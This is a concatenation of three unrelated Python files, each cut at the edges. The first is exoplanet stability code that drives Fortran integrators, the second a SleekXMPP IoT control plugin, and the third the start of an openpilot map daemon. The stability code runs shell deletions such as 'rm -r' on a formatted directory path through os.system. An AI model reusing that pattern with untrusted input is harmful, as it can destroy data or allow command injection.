#idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.tra_gp_model_curve
else:
x_model = x
mu,var,std = obj.tra_gp_model_data
#print(mu[0:10])
#print(y[0:10])
#for i in range(obj.filelist.ndset):
#plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.errorbar(x,y, yerr=y_err, fmt=".",color=colors[0], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
####################### mass_semimajor ###########################################
def mass_a_from_Kepler_fit(a,npl,m0):
'''Calculates the actual masses and Jacobi semimajor axes of a
system for assumed sin(i) using the parameters P, K and e from a Kepler fit
The output is now in Mjup and AU
'''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
incl = 90.0
sini = np.sin(PI*(incl/180.0))
mass = np.zeros(npl+1)
ap = np.zeros(npl)
pl_mass = np.zeros(npl)
mpold = pl_mass
#*******G is set to be unit, and s, m, kg as unit of time, length and mass
#***** and there is a reason for that! later I might correct for that.
mtotal = m0
f = 5e-6
for i in range(npl):
T = a[5*i+1]*86400.0
mass[0] = m0
# we need innitial guess for each planet mass
dm = 0
mass[i+1] = abs(a[5*i])*(T*(m0)**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = m0
mass[i+1] = abs(a[5*i])*(T*(m0 + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
else:
mtotal = m0
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(a[5*i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(npl):
ap[i] = ap[i]/AU # to be in AU
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
def run_stability(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './run', remove_stab_save_dir = True, integrator='symba' ):
#if not os.path.exists(directory):
# os.makedirs(directory)
#if integrator=='symba':
# os.chdir('./stability/symba/')
#elif integrator=='mvs':
# os.chdir('./stability/mvs/')
#elif integrator=='mvs_gr':
# os.chdir('./stability/mvs_gr/')
#if stab_save_dir != '':
os.chdir('./stability/')
os.system("mkdir %s"%stab_save_dir)
os.chdir("./%s"%stab_save_dir)
print("running stability with: %s"%integrator)
##### crate the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(timemax)*365.25 # make it is days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.params.stellar_mass).encode()), bytes(str(obj.npl).encode() ) ))
for j in range(obj.npl):
getin_file.write(b'%s \n'%bytes(str(obj.fit_results.mass[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.fit_results.a[j]).encode()),
bytes(str(obj.params.planet_params[7*j + 2]).encode()),
bytes(str(obj.params.planet_params[7*j + 5]).encode()),
bytes(str(obj.params.planet_params[7*j + 3]).encode()),
bytes(str(obj.params.planet_params[7*j + 6]).encode()),
bytes(str(obj.params.planet_params[7*j + 4]).encode() )) )
getin_file.close()
# runnning fortran codes
result, flag = run_command_with_timeout('../mvs/geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('../symba/swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('../mvs/swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('../mvs_gr/swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
#print('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%obj.GR_step)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl):
if integrator=='symba':
result, flag = run_command_with_timeout('../symba/follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('../mvs/follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
#try:
# os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
#except OSError:
# pass
os.chdir('../')
if remove_stab_save_dir == True:
os.system("rm -r %s"%stab_save_dir)
os.chdir('../')
print("stability with: %s done!"%integrator)
return obj
def run_stability_arb(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './', integrator='symba'):
#if not os.path.exists(directory):
# os.makedirs(directory)
if integrator=='symba':
os.chdir('./stability/symba/')
elif integrator=='mvs':
os.chdir('./stability/mvs/')
elif integrator=='mvs_gr':
os.chdir('./stability/mvs_gr/')
print("running stability with: %s"%integrator)
##### crate the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(timemax)*365.25 # make it is days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.arb_st_mass).encode()), bytes(str(obj.npl_arb).encode() ) ))
for j in range(9):
if obj.pl_arb_use[j] == True:
getin_file.write(b'%s \n'%bytes(str(obj.mass_arb[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.a_arb[j]).encode()),
bytes(str(obj.e_arb[j]).encode()),
bytes(str(obj.i_arb[j]).encode()),
bytes(str(obj.w_arb[j]).encode()),
bytes(str(obj.Node_arb[j]).encode()),
bytes(str(obj.M0_arb[j]).encode() )) )
else:
continue
#
getin_file.close()
# runnning fortran codes
result, flag = run_command_with_timeout('./geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('./swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('./swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl_arb):
if integrator=='symba':
result, flag = run_command_with_timeout('./follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('./follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
obj.evol_T[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_a[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_e[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_p[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [6])
obj.evol_M[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [7])
obj.evol_i[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [4])
obj.evol_Om[k] = np.genfromtxt("pl_%s.out"%(k+1),skip_header=0, unpack=True,skip_footer=1, usecols = [5])
obj.evol_Per[k] = a_to_P(obj.evol_a[k],obj.params.stellar_mass)
try:
os.system('rm *.out *.dat *.in')
#os.system('mv *.out *.dat *.in last_run')
except OSError:
pass
os.chdir('../../')
print("stability with: %s done!"%integrator)
return obj
def run_copl_fit_stab(obj, incl_max=90.0, incl_min=90.0, incl_step = 1.0, save_output=True, output_file="./copl_incl.txt", fit_bf = False,
timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './run', remove_stab_save_dir = True, integrator='symba',a_threshold =10, e_max =0.9):
"""So far only RVs can be fitted!!!"""
incl_fit = dill.copy(obj)
incl_fit.mod_dynamical=True
if save_output == True:
f = open(output_file,"w")
incl_range = np.arange(incl_max,incl_min,-incl_step)
for incl in incl_range:
for i in range(incl_fit.npl):
incl_fit.params.planet_params[7*i+5] = incl
incl_fit.use.use_planet_params[7*i+5] = False
if fit_bf:
incl_fit.use.update_use_planet_params_one_planet(i,True,True,True,True,True,False,False)
else:
incl_fit.use.update_use_planet_params_one_planet(i,False,False,False,False,False,False,False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=False, amoeba_starts=0, print_stat=False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
incl_fit.fitting(outputfiles=[1,1,1], doGP=False, minimize_fortran=True, minimize_loglik=True, amoeba_starts=10, print_stat=False)
run_stability(incl_fit, timemax=timemax, timestep=timestep, timeout_sec=timeout_sec, stab_save_dir = stab_save_dir, remove_stab_save_dir = remove_stab_save_dir, integrator=integrator)
for i in range(incl_fit.npl):
export_orbital_evol(incl_fit, file='planet_%s_%s.txt'%(i,incl), planet = i+1, width = 10, precision = 6)
stab_amd = int(get_AMD_stab(incl_fit))
stab = 1
for i in range(incl_fit.npl):
if max(incl_fit.evol_e[i]) > e_max:
stab = 0
print("%s %s "%(incl,incl_fit.loglik))
if save_output == True:
f.write("%s"%incl_fit.loglik)
for i in range(incl_fit.npl):
for z in range(7):
f.write("%s " %(incl_fit.params.planet_params[7*i+z]))
f.write("%s %s\n"%(stab,stab_amd))
if save_output == True:
f.close()
return obj
|
control.py
|
"""
SleekXMPP: The Sleek XMPP Library
Implementation of xeps for Internet of Things
http://wiki.xmpp.org/web/Tech_pages/IoT_systems
Copyright (C) 2013 Sustainable Innovation, Joachim.lindborg@sust.se, bjorn.westrom@consoden.se
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import logging
import time
from threading import Thread, Timer, Lock
from sleekxmpp.xmlstream import JID
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.plugins.base import BasePlugin
from sleekxmpp.plugins.xep_0325 import stanza
from sleekxmpp.plugins.xep_0325.stanza import Control
log = logging.getLogger(__name__)
class XEP_0325(BasePlugin):
"""
XEP-0325: IoT Control
Actuators are devices in sensor networks that can be controlled through
the network and act with the outside world. In sensor networks and
Internet of Things applications, actuators make it possible to automate
real-world processes.
This plugin implements a mechanism whereby actuators can be controlled
in XMPP-based sensor networks, making it possible to integrate sensors
and actuators of different brands, makes and models into larger
Internet of Things applications.
Also see <http://xmpp.org/extensions/xep-0325.html>
Configuration Values:
threaded -- Indicates if communication with sensors should be threaded.
Defaults to True.
Events:
Sensor side
-----------
Control Event:DirectSet -- Received a control message
Control Event:SetReq -- Received a control request
Client side
-----------
Control Event:SetResponse -- Received a response to a
control request, type result
Control Event:SetResponseError -- Received a response to a
control request, type error
Attributes:
threaded -- Indicates if command events should be threaded.
Defaults to True.
sessions -- A dictionary or equivalent backend mapping
session IDs to dictionaries containing data
relevant to a request's session. This dictionary is used
both by the client and sensor side. On client side, seqnr
is used as key, while on sensor side, a session_id is used
as key. This ensures that the two will not collide, so
one instance can be both client and sensor.
Sensor side
-----------
nodes -- A dictionary mapping sensor nodes that are serviced through
this XMPP instance to their device handlers ("drivers").
Client side
-----------
last_seqnr -- The last used sequence number (integer). One sequence of
communication (e.g. -->request, <--accept, <--fields)
between client and sensor is identified by a unique
sequence number (unique between the client/sensor pair)
Methods:
plugin_init -- Overrides base_plugin.plugin_init
post_init -- Overrides base_plugin.post_init
plugin_end -- Overrides base_plugin.plugin_end
Sensor side
-----------
register_node -- Register a sensor as available from this XMPP
instance.
Client side
-----------
set_request -- Initiates a control request to modify data in
sensor(s). Non-blocking, a callback function will
be called when the sensor has responded.
set_command -- Initiates a control command to modify data in
sensor(s). Non-blocking. The sensor(s) will not
respond regardless of the result of the command,
so no callback is made.
"""
name = 'xep_0325'
description = 'XEP-0325 Internet of Things - Control'
dependencies = set(['xep_0030'])
stanza = stanza
default_config = {
'threaded': True
# 'session_db': None
}
def plugin_init(self):
""" Start the XEP-0325 plugin """
self.xmpp.register_handler(
Callback('Control Event:DirectSet',
StanzaPath('message/set'),
self._handle_direct_set))
self.xmpp.register_handler(
Callback('Control Event:SetReq',
StanzaPath('iq@type=set/set'),
self._handle_set_req))
self.xmpp.register_handler(
Callback('Control Event:SetResponse',
StanzaPath('iq@type=result/setResponse'),
self._handle_set_response))
self.xmpp.register_handler(
Callback('Control Event:SetResponseError',
StanzaPath('iq@type=error/setResponse'),
self._handle_set_response))
# Server side dicts
self.nodes = {};
self.sessions = {};
self.last_seqnr = 0;
self.seqnr_lock = Lock();
## For testning only
self.test_authenticated_from = ""
def post_init(self):
""" Init complete. Register our features in Serivce discovery. """
BasePlugin.post_init(self)
self.xmpp['xep_0030'].add_feature(Control.namespace)
self.xmpp['xep_0030'].set_items(node=Control.namespace, items=tuple())
def _new_session(self):
""" Return a new session ID. """
return str(time.time()) + '-' + self.xmpp.new_id()
def plugin_end(self):
""" Stop the XEP-0325 plugin """
self.sessions.clear();
self.xmpp.remove_handler('Control Event:DirectSet')
self.xmpp.remove_handler('Control Event:SetReq')
self.xmpp.remove_handler('Control Event:SetResponse')
self.xmpp.remove_handler('Control Event:SetResponseError')
self.xmpp['xep_0030'].del_feature(feature=Control.namespace)
self.xmpp['xep_0030'].set_items(node=Control.namespace, items=tuple());
# =================================================================
# Sensor side (data provider) API
def register_node(self, nodeId, device, commTimeout, sourceId=None, cacheType=None):
"""
Register a sensor/device as available for control requests/commands
through this XMPP instance.
The device object may by any custom implementation to support
specific devices, but it must implement the functions:
has_control_field
set_control_fields
according to the interfaces shown in the example device.py file.
Arguments:
nodeId -- The identifier for the device
device -- The device object
commTimeout -- Time in seconds to wait between each callback from device during
a data readout. Float.
sourceId -- [optional] identifying the data source controlling the device
cacheType -- [optional] narrowing down the search to a specific kind of node
"""
self.nodes[nodeId] = {"device": device,
"commTimeout": commTimeout,
"sourceId": sourceId,
"cacheType": cacheType};
def _set_authenticated(self, auth=''):
""" Internal testing function """
self.test_authenticated_from = auth;
def _get_new_seqnr(self):
""" Returns a unique sequence number (unique across threads) """
self.seqnr_lock.acquire();
self.last_seqnr = self.last_seqnr + 1;
self.seqnr_lock.release();
return str(self.last_seqnr);
def _handle_set_req(self, iq):
"""
Event handler for reception of an Iq with set req - this is a
control request.
Verifies that
- all the requested nodes are available
(if no nodes are specified in the request, assume all nodes)
- all the control fields are available from all requested nodes
(if no nodes are specified in the request, assume all nodes)
If the request passes verification, the control request is passed
to the devices (in a separate thread).
If the verification fails, a setResponse with error indication
is sent.
"""
error_msg = '';
req_ok = True;
missing_node = None;
missing_field = None;
# Authentication
if len(self.test_authenticated_from) > 0 and not iq['from'] == self.test_authenticated_from:
# Invalid authentication
req_ok = False;
error_msg = "Access denied";
# Nodes
process_nodes = [];
if len(iq['set']['nodes']) > 0:
for n in iq['set']['nodes']:
if not n['nodeId'] in self.nodes:
req_ok = False;
missing_node = n['nodeId'];
error_msg = "Invalid nodeId " + n['nodeId'];
process_nodes = [n['nodeId'] for n in iq['set']['nodes']];
else:
process_nodes = self.nodes.keys();
# Fields - for control we need to find all in all devices, otherwise we reject
process_fields = [];
if len(iq['set']['datas']) > 0:
for f in iq['set']['datas']:
for node in self.nodes:
if not self.nodes[node]["device"].has_control_field(f['name'], f._get_typename()):
req_ok = False;
missing_field = f['name'];
error_msg = "Invalid field " + f['name'];
break;
process_fields = [(f['name'], f._get_typename(), f['value']) for f in iq['set']['datas']];
if req_ok:
session = self._new_session();
self.sessions[session] = {"from": iq['from'], "to": iq['to'], "seqnr": iq['id']};
self.sessions[session]["commTimers"] = {};
self.sessions[session]["nodeDone"] = {};
# Flag that a reply is exected when we are done
self.sessions[session]["reply"] = True;
self.sessions[session]["node_list"] = process_nodes;
if self.threaded:
#print("starting thread")
tr_req = Thread(target=self._threaded_node_request, args=(session, process_fields))
tr_req.start()
#print("started thread")
else:
self._threaded_node_request(session, process_fields);
else:
iq.reply();
iq['type'] = 'error';
iq['setResponse']['responseCode'] = "NotFound";
if missing_node is not None:
iq['setResponse'].add_node(missing_node);
if missing_field is not None:
iq['setResponse'].add_data(missing_field);
iq['setResponse']['error']['var'] = "Output";
iq['setResponse']['error']['text'] = error_msg;
iq.send(block=False);
def _handle_direct_set(self, msg):
"""
Event handler for reception of a Message with set command - this is a
direct control command.
Verifies that
- all the requested nodes are available
(if no nodes are specified in the request, assume all nodes)
- all the control fields are available from all requested nodes
(if no nodes are specified in the request, assume all nodes)
If the request passes verification, the control request is passed
to the devices (in a separate thread).
If the verification fails, do nothing.
"""
req_ok = True;
# Nodes
process_nodes = [];
if len(msg['set']['nodes']) > 0:
for n in msg['set']['nodes']:
if not n['nodeId'] in self.nodes:
req_ok = False;
error_msg = "Invalid nodeId " + n['nodeId'];
process_nodes = [n['nodeId'] for n in msg['set']['nodes']];
else:
process_nodes = self.nodes.keys();
# Fields - for control we need to find all in all devices, otherwise we reject
process_fields = [];
if len(msg['set']['datas']) > 0:
for f in msg['set']['datas']:
for node in self.nodes:
if not self.nodes[node]["device"].has_control_field(f['name'], f._get_typename()):
req_ok = False;
missing_field = f['name'];
error_msg = "Invalid field " + f['name'];
break;
process_fields = [(f['name'], f._get_typename(), f['value']) for f in msg['set']['datas']];
if req_ok:
session = self._new_session();
self.sessions[session] = {"from": msg['from'], "to": msg['to']};
self.sessions[session]["commTimers"] = {};
self.sessions[session]["nodeDone"] = {};
self.sessions[session]["reply"] = False;
self.sessions[session]["node_list"] = process_nodes;
if self.threaded:
#print("starting thread")
tr_req = Thread(target=self._threaded_node_request, args=(session, process_fields))
tr_req.start()
#print("started thread")
else:
self._threaded_node_request(session, process_fields);
def _threaded_node_request(self, session, process_fields):
"""
Helper function to handle the device control in a separate thread.
Arguments:
session -- The request session id
process_fields -- The fields to set in the devices. List of tuple format:
(name, datatype, value)
"""
for node in self.sessions[session]["node_list"]:
self.sessions[session]["nodeDone"][node] = False;
for node in self.sessions[session]["node_list"]:
timer = Timer(self.nodes[node]['commTimeout'], self._event_comm_timeout, args=(session, node));
self.sessions[session]["commTimers"][node] = timer;
timer.start();
self.nodes[node]['device'].set_control_fields(process_fields, session=session, callback=self._device_set_command_callback);
def _event_comm_timeout(self, session, nodeId):
"""
Triggered if any of the control operations timeout.
Stop communicating with the failing device.
If the control command was an Iq request, sends a failure
message back to the client.
Arguments:
session -- The request session id
nodeId -- The id of the device which timed out
"""
if self.sessions[session]["reply"]:
# Reply is exected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "error";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OtherError";
iq['setResponse'].add_node(nodeId);
iq['setResponse']['error']['var'] = "Output";
iq['setResponse']['error']['text'] = "Timeout.";
iq.send(block=False);
## TODO - should we send one timeout per node??
# Drop communication with this device and check if we are done
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
# The session is complete, delete it
del self.sessions[session];
def _all_nodes_done(self, session):
"""
Checks wheter all devices are done replying to the control command.
Arguments:
session -- The request session id
"""
for n in self.sessions[session]["nodeDone"]:
if not self.sessions[session]["nodeDone"][n]:
return False;
return True;
def _device_set_command_callback(self, session, nodeId, result, error_field=None, error_msg=None):
"""
Callback function called by the devices when the control command is
complete or failed.
If needed, composes a message with the result and sends it back to the
client.
Arguments:
session -- The request session id
nodeId -- The device id which initiated the callback
result -- The current result status of the control command. Valid values are:
"error" - Set fields failed.
"ok" - All fields were set.
error_field -- [optional] Only applies when result == "error"
The field name that failed (usually means it is missing)
error_msg -- [optional] Only applies when result == "error".
Error details when a request failed.
"""
if not session in self.sessions:
# This can happend if a session was deleted, like in a timeout. Just drop the data.
return
if result == "error":
self.sessions[session]["commTimers"][nodeId].cancel();
if self.sessions[session]["reply"]:
# Reply is exected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "error";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OtherError";
iq['setResponse'].add_node(nodeId);
if error_field is not None:
iq['setResponse'].add_data(error_field);
iq['setResponse']['error']['var'] = error_field;
iq['setResponse']['error']['text'] = error_msg;
iq.send(block=False);
# Drop communication with this device and check if we are done
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
# The session is complete, delete it
del self.sessions[session];
else:
self.sessions[session]["commTimers"][nodeId].cancel();
self.sessions[session]["nodeDone"][nodeId] = True;
if (self._all_nodes_done(session)):
if self.sessions[session]["reply"]:
# Reply is exected when we are done
iq = self.xmpp.Iq();
iq['from'] = self.sessions[session]['to'];
iq['to'] = self.sessions[session]['from'];
iq['type'] = "result";
iq['id'] = self.sessions[session]['seqnr'];
iq['setResponse']['responseCode'] = "OK";
iq.send(block=False);
# The session is complete, delete it
del self.sessions[session];
# =================================================================
# Client side (data controller) API
def set_request(self, from_jid, to_jid, callback, fields, nodeIds=None):
"""
Called on the client side to initiade a control request.
Composes a message with the request and sends it to the device(s).
Does not block, the callback will be called when the device(s)
has responded.
Arguments:
from_jid -- The jid of the requester
to_jid -- The jid of the device(s)
callback -- The callback function to call when data is availble.
The callback function must support the following arguments:
from_jid -- The jid of the responding device(s)
result -- The result of the control request. Valid values are:
"OK" - Control request completed successfully
"NotFound" - One or more nodes or fields are missing
"InsufficientPrivileges" - Not authorized.
"Locked" - Field(s) is locked and cannot
be changed at the moment.
"NotImplemented" - Request feature not implemented.
"FormError" - Error while setting with
a form (not implemented).
"OtherError" - Indicates other types of
errors, such as timeout.
Details in the error_msg.
nodeId -- [optional] Only applicable when result == "error"
List of node Ids of failing device(s).
fields -- [optional] Only applicable when result == "error"
List of fields that failed.[optional] Mandatory when result == "rejected" or "failure".
error_msg -- Details about why the request failed.
fields -- Fields to set. List of tuple format: (name, typename, value).
nodeIds -- [optional] Limits the request to the node Ids in this list.
"""
iq = self.xmpp.Iq();
iq['from'] = from_jid;
iq['to'] = to_jid;
seqnr = self._get_new_seqnr();
iq['id'] = seqnr;
iq['type'] = "set";
if nodeIds is not None:
for nodeId in nodeIds:
iq['set'].add_node(nodeId);
if fields is not None:
for name, typename, value in fields:
iq['set'].add_data(name=name, typename=typename, value=value);
self.sessions[seqnr] = {"from": iq['from'], "to": iq['to'], "callback": callback};
iq.send(block=False);
def set_command(self, from_jid, to_jid, fields, nodeIds=None):
"""
Called on the client side to initiade a control command.
Composes a message with the set commandand sends it to the device(s).
Does not block. Device(s) will not respond, regardless of result.
Arguments:
from_jid -- The jid of the requester
to_jid -- The jid of the device(s)
fields -- Fields to set. List of tuple format: (name, typename, value).
nodeIds -- [optional] Limits the request to the node Ids in this list.
"""
msg = self.xmpp.Message();
msg['from'] = from_jid;
msg['to'] = to_jid;
msg['type'] = "set";
if nodeIds is not None:
for nodeId in nodeIds:
msg['set'].add_node(nodeId);
if fields is not None:
for name, typename, value in fields:
msg['set'].add_data(name, typename, value);
# We won't get any reply, so don't create a session
msg.send();
def _handle_set_response(self, iq):
""" Received response from device(s) """
#print("ooh")
seqnr = iq['id'];
from_jid = str(iq['from']);
result = iq['setResponse']['responseCode'];
nodeIds = [n['name'] for n in iq['setResponse']['nodes']];
fields = [f['name'] for f in iq['setResponse']['datas']];
error_msg = None;
if not iq['setResponse'].find('error') is None and not iq['setResponse']['error']['text'] == "":
error_msg = iq['setResponse']['error']['text'];
callback = self.sessions[seqnr]["callback"];
callback(from_jid=from_jid, result=result, nodeIds=nodeIds, fields=fields, error_msg=error_msg);
|
mapd.py
|
#!/usr/bin/env python
# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
from scipy import spatial
except ImportError as e:
import os
import sys
openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path
args = [sys.executable]
args.extend(sys.argv)
os.execv(sys.executable, args)
DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
from selfdrive.mapd import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)
import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict
from math import sin,cos
from common.params import Params
from common.transformations.coordinates import geodetic2ecef
from selfdrive.services import service_list
import selfdrive.messaging as messaging
from selfdrive.mapd.mapd_helpers import MAPS_LOOKAHEAD_DISTANCE, Way, circle_through_points
import selfdrive.crash as crash
from selfdrive.version import version, dirty
OVERPASS_API_URL = "https://overpass.kumi.systems/api/interpreter"
OVERPASS_HEADERS = {
'User-Agent': 'NEOS (comma.ai)',
'Accept-Encoding': 'gzip'
}
last_gps = None
query_lock = threading.Lock()
last_query_result = None
last_query_pos = None
cache_valid = False
def build_way_query(lat, lon, radius=50):
"""Builds a query to find all highways within a given radius around a point"""
pos = " (around:%f,%f,%f)" % (radius, lat, lon)
lat_lon = "(%f,%f)" % (lat, lon)
q = """(
way
""" + pos + """
[highway][highway!~"^(footway|path|bridleway|steps|cycleway|construction|bus_guideway|escape)$"];
>;);out;""" + """is_in""" + lat_lon + """;area._[admin_level~"[24]"];
convert area ::id = id(), admin_level = t['admin_level'],
